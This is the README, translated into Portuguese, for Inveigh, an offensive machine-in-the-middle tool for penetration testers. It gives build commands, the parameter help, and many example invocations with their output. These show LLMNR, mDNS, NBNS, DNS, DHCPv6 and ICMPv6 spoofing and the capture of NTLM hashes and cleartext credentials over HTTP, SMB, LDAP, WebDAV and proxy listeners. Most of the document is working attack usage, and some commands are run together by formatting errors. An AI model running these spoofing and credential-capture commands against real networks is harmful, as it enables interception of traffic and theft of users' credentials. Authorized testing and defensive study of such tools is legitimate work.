
.NET IPv4/IPv6 ferramenta machine-in-the-middle para testadores de penetração
Inveigh é uma ferramenta multiplataforma .NET IPv4/IPv6 machine-in-the-middle para testadores de penetração. Este repositório contém a versão primária em C# bem como a versão legada em PowerShell.
Inveigh realiza ataques de spoofing e captura de hashes/credenciais tanto por sniffing de pacotes quanto por listeners/sockets específicos de protocolo. O método de sniffing de pacotes, que foi a base para a versão original em PowerShell desta ferramenta, tem as seguintes vantagens:
A principal desvantagem é o acesso elevado necessário.
Nas versões atuais do Windows, os serviços UDP em execução por padrão permitem reutilização de portas. Portanto, o sniffing de pacotes não oferece mais vantagem para contornar portas UDP em uso. Os listeners UDP do Inveigh são todos configurados para aproveitar a reutilização de portas.
A versão C# do Inveigh contém ataques para os seguintes protocolos:
Inveigh funciona com IPv4 e IPv6 nos casos em que o suporte para ambos é fornecido pelo protocolo subjacente.
O arquivo de projeto no estilo SDK do Inveigh está configurado para .NET 3.5, 4.6.2 e 6.0, sendo o 6.0 a versão que também funciona com Linux e macOS.
<TargetFrameworks>net35;net62;net6.0</TargetFrameworks>
sudo route -nv add -net ff02::1:2 -interface en0dotnet Inveigh.dll
Com .NET 6.0 instalado no sistema alvo
dotnet publish -r linux-x64 -f net8.0 -p:AssemblyName=inveigh
dotnet publish -r osx-x64 -f net8.0 -p:AssemblyName=inveigh
Sem .NET 6.0 instalado no sistema alvo
dotnet publish --self-contained=true -p:PublishSingleFile=true -r linux-x64 -f net8.0 -p:AssemblyName=inveigh
dotnet publish --self-contained=true -p:PublishSingleFile=true -r osx-x64 -f net8.0 -p:AssemblyName=inveigh
Os valores de parâmetros padrão estão localizados no início do Program.cs. Recomendo revisar e definir tudo de acordo com suas necessidades antes de compilar. Todos os parâmetros de ativar/desativar podem ser definidos com valores Y/N.```
//begin parameters - set defaults as needed before compile
public static string argCert = "MIIKaQIBAzCCC..."
public static string argCertPassword = "password";
public static string argChallenge = "";
public static string argConsole = "5";
public static string argConsoleLimit = "-1";
public static string argConsoleStatus = "0";
public static string argConsoleUnique = "Y";
public static string argDHCPv6 = "N";
public static string argDHCPv6TTL = "30";
public static string argDNS = "Y";
...
//end parameters
### Ajuda de Parâmetros```
.\Inveigh.exe -?
Control:
-Inspect Default=Disabled: (Y/N) inspect traffic only.
-IPv4 Default=Enabled: (Y/N) IPv4 spoofing/capture.
-IPv6 Default=Enabled: (Y/N) IPv6 spoofing/capture.
-RunCount Default=Unlimited: Number of NetNTLM captures to perform before auto-exiting.
-RunTime Default=Unlimited: Run time duration in minutes.
Output:
-Console Default=5: Set the level for console output. (0=none, 1=only captures/spoofs, 2=no disabled, no informational, 3=no disabled, no filtered, 4=no disabled, 5=all)
-ConsoleLimit Default=Unlimited: Limit to queued console entries.
-ConsoleStatus Default=Disabled: Interval in minutes for auto-displaying capture details.
-ConsoleUnique Default=Enabled: (Y/N) displaying only unique (user and system combination) hashes at time of capture.
-FileDirectory Default=Working Directory: Valid path to an output directory for enabled file output.
-FileOutput Default=Enabled: (Y/N) real time file output.
-FilePrefix Default=Inveigh: Prefix for all output files.
-FileUnique Default=Enabled: (Y/N) outputting only unique (user and system combination) hashes.
-LogOutput Default=Disabled: (Y/N) outputting log entries.
Spoofers:
-DHCPV6 Default=Disabled: (Y/N) DHCPv6 spoofing.
-DHCPv6TTL Default=300: Lease lifetime in seconds.
-DNS Default=Enabled: (Y/N) DNS spoofing.
-DNSHost Fully qualified hostname to use SOA/SRV responses.
-DNSSRV Default=LDAP: Comma separated list of SRV request services to answer.
-DNSSuffix DNS search suffix to include in DHCPv6/ICMPv6 responses.
-DNSTTL Default=30: DNS TTL in seconds.
-DNSTYPES Default=A: (A, AAAA, SOA, SRV) Comma separated list of DNS types to spoof.
-ICMPv6 Default=Enabled: (Y/N) sending ICMPv6 router advertisements.
-ICMPv6Interval Default=200: ICMPv6 RA interval in seconds.
-ICMPv6TTL Default=300: ICMPv6 TTL in seconds.
-IgnoreDomains Default=None: Comma separated list of domains to ignore when spoofing.
-IgnoreIPs Default=Local: Comma separated list of source IP addresses to ignore when spoofing.
-IgnoreMACs Default=Local: Comma separated list of MAC addresses to ignore when DHCPv6 spoofing.
-IgnoreQueries Default=None: Comma separated list of name queries to ignore when spoofing.
-Local Default=Disabled: (Y/N) performing spoofing attacks against the host system.
-LLMNR Default=Enabled: (Y/N) LLMNR spoofing.
-LLMNRTTL Default=30: LLMNR TTL in seconds.
-MAC Local MAC address for DHCPv6.
-MDNS Default=Enabled: (Y/N) mDNS spoofing.
-MDNSQuestions Default=QU,QM: Comma separated list of question types to spoof. (QU,QM)
-MDNSTTL Default=120: mDNS TTL in seconds.
-MDNSTypes Default=A: Comma separated list of mDNS record types to spoof. (A,AAAA,ANY)
-MDNSUnicast Default=Enabled: (Y/N) sending a unicast only response to a QM request.
-NBNS Default=Disabled: (Y/N) NBNS spoofing.
-NBNSTTL Default=165: NBNS TTL in seconds.
-NBNSTypes Default=00,20: Comma separated list of NBNS types to spoof. (00,03,20,1B)
-ReplyToDomains Default=All: Comma separated list of domains to respond to when spoofing.
-ReplyToIPs Default=All: Comma separated list of source IP addresses to respond to when spoofing.
-ReplyToMACs Default=All: Comma separated list of MAC addresses to respond to when DHCPv6 spoofing.
-ReplyToQueries Default=All: Comma separated list of name queries to respond to when spoofing.
-SpooferIP Default=Autoassign: IP address included in spoofing responses.
-SpooferIPv6 Default=Autoassign: IPv6 address included in spoofing responses.
-Repeat Default=Enabled: (Y/N) repeated spoofing attacks against a system after NetNTLM capture.
Capture:
-Cert Base64 certificate for TLS.
-CertPassword Base64 certificate password for TLS.
-Challenge Default=Random per request: 16 character hex NetNTLM challenge for use with the TCP listeners.
-HTTP Default=Enabled: (Y/N) HTTP listener.
-HTTPAuth Default=NTLM: (Anonymous/Basic/NTLM) HTTP/HTTPS listener authentication.
-HTTPPorts Default=80: Comma seperated list of TCP ports for the HTTP listener.
-HTTPRealm Default=ADFS: Basic authentication realm.
-HTTPResponse Content to serve as the default HTTP/HTTPS/Proxy response.
-HTTPS Default=Enabled: (Y/N) HTTPS listener.
-HTTPSPorts Default=443: Comma separated list of TCP ports for the HTTPS listener.
-IgnoreAgents Default=Firefox: Comma separated list of HTTP user agents to ignore with wpad and proxy auth.
-LDAP Default=Enabled: (Y/N) LDAP listener.
-LDAPPorts Default=389: Comma separated list of TCP ports for the LDAP listener.
-ListenerIP Default=Any: IP address for all listeners.
-ListenerIPv6 Default=Any: IPv6 address for all listeners.
-MachineAccount Default=Enabled: (Y/N) machine account NetNTLM captures.
-Proxy Default=Disabled: (Y/N) proxy listener authentication captures.
-ProxyAuth Default=NTLM: (Basic/NTLM) Proxy authentication.
-ProxyPort Default=8492: Port for the proxy listener.
-SMB Default=Enabled: (Y/N) SMB sniffer/listener.
-SMBPorts Default=445: Port for the SMB listener.
-SnifferIP Default=Autoassign: IP address included in spoofing responses.
-SnifferIPv6 Default=Autoassign: IPv6 address included in spoofing responses.
-WebDAV Default=Enabled: (Y/N) serving WebDAV over HTTP/HTTPS listener.
-WebDAVAuth Default=NTLM: (Anonymous/Basic/NTLM) WebDAV authentication.
-WPADAuth Default=Enabled: (Y/N) authentication type for wpad.dat requests. (Anonymous/Basic/NTLM)
-WPADResponse Default=Autogenerated: Contents of wpad.dat responses.
.\Inveigh.exe [] Inveigh 2.0 [Started 2021-06-15T00:08:37 | PID 12588] [+] Packet Sniffer Addresses [IP 10.10.2.111 | IPv6 fe80::3d3b:b73c:c43e:ed4e%2] [+] Listener Addresses [IP 0.0.0.0 | IPv6 ::] [+] Spoofer Reply Addresses [IP 10.10.2.111 | IPv6 fe80::3d3b:b73c:c43e:ed4e%2] [+] Spoofer Options [Repeat Enabled | Local Attacks Disabled] [-] DHCPv6 [+] DNS Packet Sniffer [Type A] [-] ICMPv6 [+] LLMNR Packet Sniffer [Type A] [-] MDNS [-] NBNS [+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80] [-] HTTPS [+] WebDAV [WebDAVAuth NTLM] [-] Proxy [+] LDAP Listener [Port 389] [+] SMB Packet Sniffer [Port 445] [+] File Output [C:\Users\dev\source\repos\Inveigh\Inveigh\bin\Debug\net35] [+] Previous Session Files [Imported] [] Press ESC to enter/exit interactive console
### Modo Apenas Ouvinte (sniffer de pacotes desabilitado)```
.\Inveigh.exe -sniffer n
[*] Inveigh 2.0 [Started 2021-06-14T10:48:16 | PID 20368]
[-] Packet Sniffer
[+] Listener Addresses [IP 0.0.0.0 | IPv6 ::]
[+] Spoofer Reply Addresses [IP 10.10.2.111 | IPv6 fe80::3d3b:b73c:c43e:ed4e%2]
[+] Spoofer Options [Repeat Enabled | Local Attacks Disabled]
[-] DHCPv6
[+] DNS Listener [Type A]
[-] ICMPv6
[+] LLMNR Listener [Type A]
[-] MDNS
[-] NBNS
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
[-] HTTPS
[+] WebDAV [WebDAVAuth NTLM]
[-] Proxy
[+] LDAP Listener [Port 389]
[+] SMB Listener [Port 445]
[+] File Output [C:\Users\dev\source\repos\InveighZero\Inveigh\bin\Debug\net35]
[+] Previous Session Files [Imported]
[*] Press ESC to enter/exit interactive console
[!] Failed to start SMB listener on port 445, check IP and port usage.
[!] Failed to start SMB listener on port 445, check IP and port usage.
Nota, com o farejador de pacotes desabilitado, o Inveigh tentará iniciar listeners de SMB para IPv4 e IPv6. Na maioria dos sistemas Windows, a porta 445 já estará em uso. Ignore o erro ou adicione -smb n.
Inicie o spoofer DHCPv6 e o spoofer de DNS IPv6. Nota, o DNS está ativado por padrão.``` .\Inveigh.exe -dhcpv6 y ... [+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53] [+] DNS Listener [Type A] ... [+] [23:03:06] DHCPv6 [solicitation] from fe80::bd92:a800:60d0:8deb%2(test-wks1.lab.inveigh.org) [response sent] [+] [23:03:06] DHCPv6 [fe80::1348:1] advertised to [00:0C:29:F0:6E:16] [+] [23:03:06] DHCPv6 [request] from fe80::bd92:a800:60d0:8deb%2(test-wks1.lab.inveigh.org) [response sent] [+] [23:03:06] DHCPv6 [fe80::1348:1] leased to [00:0C:29:F0:6E:16]
Iniciar DHCPv6 spoofer e spoof solicitações DNS apenas para domínio interno.```
.\Inveigh.exe -dhcpv6 y -replytodomains lab.inveigh.org
...
[+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53]
[+] DNS Listener [Type A]
...
[-] [23:10:30] DNS(A) request [test.inveigh.org] from fe80::6142:1%2 [domain ignored]
[+] [23:10:33] DNS(A) request [wpad.lab.inveigh.org] from fe80::6142:1%2 [response sent]
Inicie DHCPv6 spoofer e também envie pacotes ICMPv6 RA.``` .\Inveigh.exe -dhcpv6 y -icmpv6 y ... [+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53] [+] DNS Listener [Type A] [+] ICMPv6 Router Advertisement [Interval 200 Seconds] ... [+] [23:12:04] ICMPv6 router advertisment sent to [ff02::1]
Iniciar DHCPv6 spoofer e responder a requisições do host local.```
.\Inveigh.exe -dhcpv6 y -local y
...
[+] Spoofer Options [Repeat Enabled | Local Attacks Enabled]
[+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53]
Falsificar requisições SRV, além de A.``` .\Inveigh.exe -dnstypes A,SRV -dnshost fake.lab.inveigh.org ... [+] DNS Listener [Types A:SRV] ... [+] [23:21:05] DNS(SRV) request [_ldap._tcp.dc._msdcs.lab.inveigh.org] from fe80::242d:f99e:7534:b46f%2 [response sent]
### <a name="ICMPv6"></a>ICMPv6
Envie pacotes ICMPv6 para injetar um servidor DNS IPv6 secundário em sistemas da sub-rede local.```
.\Inveigh.exe -icmpv6 y
...
[+] ICMPv6 Router Advertisement [Option DNS | Interval 200 Seconds]
...
[+] [23:35:46] ICMPv6 router advertisement with DNSv6 sent to [ff02::1]
Envie pacotes ICMPv6 para injetar um sufixo de pesquisa DNS adicional em sistemas de sub-rede locais.``` .\Inveigh.exe -icmpv6 y -dnssuffix inveigh.net ... [+] ICMPv6 Router Advertisement [Option DNS Suffix | Interval 200 Seconds] ... [+] [23:41:17] ICMPv6 router advertisement with DNS Suffix sent to [ff02::1]
### <a name="LLMNR"></a>LLMNR
Falsificar requisições AAAA em vez de A.```
.\Inveigh.exe -llmnrtypes AAAA
...
[+] LLMNR Listener [Type AAAA]
...
[-] [23:23:38] LLMNR(A) request [test] from fe80::bd92:a800:60d0:8deb%2 [type ignored]
[-] [23:23:38] LLMNR(A) request [test] from 10.10.2.201 [type ignored]
[+] [23:23:38] LLMNR(AAAA) request [test] from 10.10.2.201 [response sent]
[+] [23:23:38] LLMNR(AAAA) request [test] from fe80::bd92:a800:60d0:8deb%2 [response sent]
Iniciar o mDNS spoofer e enviar respostas unicast para requisições QM.``` .\Inveigh.exe -mdns y ... [+] MDNS Listener [Questions QU:QM | Type A] ... [+] [23:25:58] mDNS(QM)(A) request [test.local] from fe80::bd92:a800:60d0:8deb%2 [response sent] [+] [23:25:58] mDNS(QM)(A) request [test.local] from 10.10.2.201 [response sent] [-] [23:25:58] mDNS(QM)(AAAA) request [test.local] from 10.10.2.201 [type ignored] [-] [23:25:58] mDNS(QM)(AAAA) request [test.local] from fe80::bd92:a800:60d0:8deb%2 [type ignored]
Iniciar mDNS spoofer e enviar respostas multicast para solicitações QM.```
.\Inveigh.exe -mdns y -mdnsunicast n
...
[+] MDNS Listener [Questions QU:QM | Type A]
...
[+] [23:28:26] mDNS(QM)(A) request [test.local] from 10.10.2.201 [response sent]
[+] [23:28:26] mDNS(QM)(A) request [test.local] from fe80::bd92:a800:60d0:8deb%2 [response sent]
Iniciar spoofer NBNS``` .\Inveigh.exe -nbns y ... [+] NBNS Listener [Types 00:20] ... [+] [23:33:09] NBNS(00) request [TEST] from 10.10.2.201 [response sent]
### <a name="HTTP"></a>HTTP
Iniciar o listener HTTP na porta 80 (ativado por padrão)```
.\Inveigh.exe
...
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
...
Iniciar ouvintes HTTP em múltiplas portas``` .\Inveigh.exe -httpports 80,8080 ... [+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Ports 80:8080] ...
### <a name="HTTPS"></a>HTTPS
Inicie o ouvinte HTTPS na porta 443 com o certificado padrão do Inveigh.```
.\Inveigh.exe -https y
...
[+] HTTPS Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 443]
...
Inicia o sniffer de pacotes SMB (ativado por padrão)``` .\Inveigh.exe ... [+] SMB Packet Sniffer [Port 445] ...
Iniciar o SMB listener na porta 445```
.\Inveigh.exe -sniffer n
...
[+] SMB Listener [Port 445]
...
Iniciar ouvinte LDAP na porta 389``` .\Inveigh.exe ... [+] LDAP Listener [Port 389] ...
### <a name="WebDAV"></a>WebDAV
Inicie o ouvinte HTTP com suporte a WebDAV (ativado por padrão)```
.\Inveigh.exe
...
[+] WebDAV [WebDAVAuth NTLM]
...
Ativar captura de autenticação de proxy na porta 8492``` .\Inveigh.exe -proxy y ... [+] Proxy Listener [ProxyAuth NTLM | Port 8492] ...
## Console
O Inveigh contém um console acessível enquanto a ferramenta está em execução (pressione escape para entrar e sair). O console fornece acesso fácil a credenciais/hashes capturados e outras informações diversas. O prompt do console fornece atualizações em tempo real para as contagens de captura de cleartext, NTLMv1 e NTLMv2 no formato unique:total. Observe que o console pode ficar inacessível quando executado através de C2.
### Ajuda do Console Interativo - digite ? ou HELP```
=============================================== Inveigh Console Commands ===============================================
Command Description
========================================================================================================================
GET CONSOLE | get queued console output
GET DHCPv6Leases | get DHCPv6 assigned IPv6 addresses
GET LOG | get log entries; add search string to filter results
GET NTLMV1 | get captured NTLMv1 hashes; add search string to filter results
GET NTLMV2 | get captured NTLMv2 hashes; add search string to filter results
GET NTLMV1UNIQUE | get one captured NTLMv1 hash per user; add search string to filter results
GET NTLMV2UNIQUE | get one captured NTLMv2 hash per user; add search string to filter results
GET NTLMV1USERNAMES | get usernames and source IPs/hostnames for captured NTLMv1 hashes
GET NTLMV2USERNAMES | get usernames and source IPs/hostnames for captured NTLMv2 hashes
GET CLEARTEXT | get captured cleartext credentials
GET CLEARTEXTUNIQUE | get unique captured cleartext credentials
GET REPLYTODOMAINS | get ReplyToDomains parameter startup values
GET REPLYTOIPS | get ReplyToIPs parameter startup values
GET REPLYTOMACS | get ReplyToMACs parameter startup values
GET REPLYTOQUERIES | get ReplyToQueries parameter startup values
GET IGNOREDOMAINS | get IgnoreDomains parameter startup values
GET IGNOREIPS | get IgnoreIPs parameter startup values
GET IGNOREMACS | get IgnoreMACs parameter startup values
GET IGNOREQUERIES | get IgnoreQueries parameter startup values
SET CONSOLE | set Console parameter value
HISTORY | get command history
RESUME | resume real time console output
STOP | stop Inveigh
O prompt do console contém contagens de captura em tempo real.``` C(0:0) NTLMv1(0:0) NTLMv2(0:0)>
Cleartext(unique:total) NTLMv1(unique:total) NTLMv2(unique:total)
## Quiddity
A biblioteca de protocolos usada pelo Inveigh está localizada [aqui](https://github.com/Kevin-Robertson/Quiddity).
## Agradecimentos Especiais
* Responder - https://github.com/lgandx/Responder
* Impacket - https://github.com/SecureAuthCorp/impacket
* mitm6 - https://github.com/fox-it/mitm6